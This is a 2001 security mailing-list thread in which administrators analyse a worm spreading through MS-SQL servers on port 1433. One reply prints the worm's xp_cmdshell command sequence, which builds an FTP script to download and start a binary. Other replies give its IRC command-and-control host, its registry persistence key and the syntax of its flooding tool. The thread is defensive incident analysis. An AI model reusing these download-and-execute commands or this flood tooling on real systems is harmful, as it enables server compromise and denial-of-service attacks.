Re: MS-SQL Worm?

[Patrick Andry <pandry () wolverinefreight ca>]

Apparently the file is no longer available on the ftp server.   
Hopefully this worm is short-lived.

Arthur Donkers wrote:

> Hi All,
>
> Analysed it a bit further (thanks to VMware and netmonitor) and
> once it is started it connects to an irc server at bots.kujikiri.net,
> port 6669. From the rest of the capture it seems it drops a message
> there with the name of the machine it compromised and a password
> like string.
>
> It furthermore (see strings output on executable, scan for registry
> keys) adds itself to the Run entry in the registry so it is started
> each time the machine is booted. A few of the registry keys:
>
>
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg
>
> SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder
>
> SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY
>
> From the strings output it seems to contain a scanner (sm6 ..) that
> will scan for new vulnerable machines. I'm not quite sure if and so,
> how, it is controlled from the IRC channel. I've tested it on our
> testing network so I'm not quite sure yet.
>
> I've attached the netmon capture file to this message.
>
> grtz,
>
> Arthur
>
> On Tue, 20 Nov 2001, Paul Nasrat wrote:
>
> > On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
> >
> > > We saw a scan come in looking for systems answering on 1433, and
> > > immediately saw several systems start scanning out for other systems
> > > answering on 1433 - worm behavior?  Has anyone else seen this?
> > No, but the binaries it downloads:
> >
> > win32mon.exe and dnsservice.exe
> >
> > Are on the ftp site in the dump.  I don't have a windows debugger to put
> > them through but they look interesting:
> >
> > exec xp_cmdshell 'start dnsservice.exe'
> > exec xp_cmdshell 'del ftp.x'
> > exec xp_cmdshell 'ftp -s:ftp.x
> > exec xp_cmdshell 'echo quit >> ftp.x'
> > exec xp_cmdshell 'echo close >> ftp.x'
> > exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
> > exec xp_cmdshell 'echo cd tmp>> ftp.x'
> > exec xp_cmdshell 'echo cd pub>> ftp.x'
> > exec xp_cmdshell 'echo bin>> ftp.x'
> > exec xp_cmdshell 'echo foo.com>> ftp.x'
> > exec xp_cmdshell 'echo ftp> ftp.x'
> >
> > GET /%s HTTP/1.0
> > Connection: Keep-Alive
> > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> > [GET] - Unable to connect to http.
> > [GET] - Unable to resolve host.
> > http://
> > [GET] - Unable to create new socket.
> > GET <bot|wildcard> <host> <save as>
> > %s %s %s %s
> > NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
> > NICK %s
> > NOTICE %s :Nick cannot be larger than 9 characters.
> > NOTICE %s :NICK <nick>
> > sm6 has finished...
> > with tcp/syn boost!
> > sm6 icmp/udp has begun...
> > sm6 icmp/udp (w/pkt-push!) has begun..
> > Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src
> > port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t
> > include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>
> >
> > etc.
> >
> > Paul Nasrat
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus ARIS analyzer service.
> > For more information on this free incident handling, management
> > and tracking system please see: http://aris.securityfocus.com
>
>
> ------------------------------------------------------------------------
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com